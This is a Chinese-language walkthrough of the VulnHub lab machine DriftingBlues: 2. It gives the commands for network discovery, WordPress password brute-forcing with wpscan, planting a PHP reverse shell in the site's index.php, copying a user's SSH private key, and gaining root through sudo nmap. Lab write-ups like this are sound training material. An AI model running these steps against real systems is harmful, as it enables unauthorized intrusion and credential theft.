描述: __________
获取标志
难度:简单
1、下载靶场
靶机名称:driftingblues
下载地址:
DriftingBlues: 2 ~ VulnHub
2、安装靶场
以DC-1为例,将文件解压(一压缩包形式进行下载)。
打开虚拟机,选择解压好的文件导入虚拟机( vof 版本高于4.0,点击重试即可导入)
导入成功,开启此虚拟机( 当页面出现 driftingblues login 时表示安装成功)。
3、获取靶机的flag(两个flag)
前提:
| 1、已知kali的IP地址(ifconfig) —— kali IP地址:192.168.108.129/24 | 2、driftingblues 和kali在同一网段 | 已知 driftingblues 所在的网段 —— driftingblues IP地址:192.168.108.164/24 |
信息收集
获取 driftingblues 的IP地址
命令:arp-scan -I eth0 -l
端口扫描
命令:nmap -sV -p- -O 192.168.108.164
//-sV:扫描系统版本和程序版本号检测,-p-:全端口扫描
获取信息如下:
| 端口号 | 服务 | 版本 |
| 21 | ftp | ProFTPD |
| 22 | ssh | OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) |
| 80 | http | Apache httpd 2.4.38 ((Debian)) |
操作系统:OS details: Linux 4.15 - 5.6
查看21端口上ftp服务并没有未授权漏洞
访问80端口之后发现只有一张图片
进行目录扫描之后发现好像存在一个wordpress网站,但是直接访问会发现访问被拒绝
发现是用域名访问的,添加host,使用wpscan工具爆破用户名,得到了一个账户:albert
wpscan --url http://driftingblues.box/blog/ -eu
继续爆破密码,使用kali自带的字典爆破,成功抛出一组账号密码:albert、scotland1
wpscan --url http://driftingblues.box/blog/ --passwords /usr/share/wordlists/rockyou.txt --usernames albert
使用账号密码(albert、scotland1)登录wordpress后台(http://driftingblues.box/blog/wp-admin/)
webshell
在后台将index.php文件中插入php-reverse-shell
在得到shell之后查看普通用户发现有一个freddie用户
在路径 /home/freddie/.ssh 下发现 id_rsa 文件,将其保存到本地,使用rsd进行登入
使用 rsa 登录ssh原理:
密钥形式登录的原理是:利用密钥生成器制作一对密钥:一只公钥和一只私钥。将公钥添加到服务器的某个账户上,然后在客户端利用私钥即可完成认证并登录。这样一来,没有私钥,任何人都无法通过 SSH 暴力破解你的密码来远程登录到系统。此外,如果将公钥复制到其他账户甚至主机,利用私钥也可以登录。
可以直接下载到kali
python2 -m SimpleHTTPServer 9998
wget http://192.168.108.164:9998/id_rsa
登录之后直接在用户家目录下就能看到flag1(user.txt)
sudo -l 之后直接发现可以使用nmap提权
原理(需要注意这里第一种无回显的提权方式测试成功,在输入指令时可以提前写好复制上去,防止输错):
如果允许二进制文件以超级用户身份运行,则它不会删除提升的权限,并可用于访问文件系统、升级或维护特权访问。(sudo)
- 输入回显被禁用。
- TF=$(mktemp)
- echo 'os.execute("/bin/sh")' > $TF
- sudo nmap --script=$TF
- 交互模式在版本 2.02 至 5.21 上可用,可用于执行 shell 命令。
- sudo nmap --interactive
- nmap> !sh
京公网安备 11010802041100号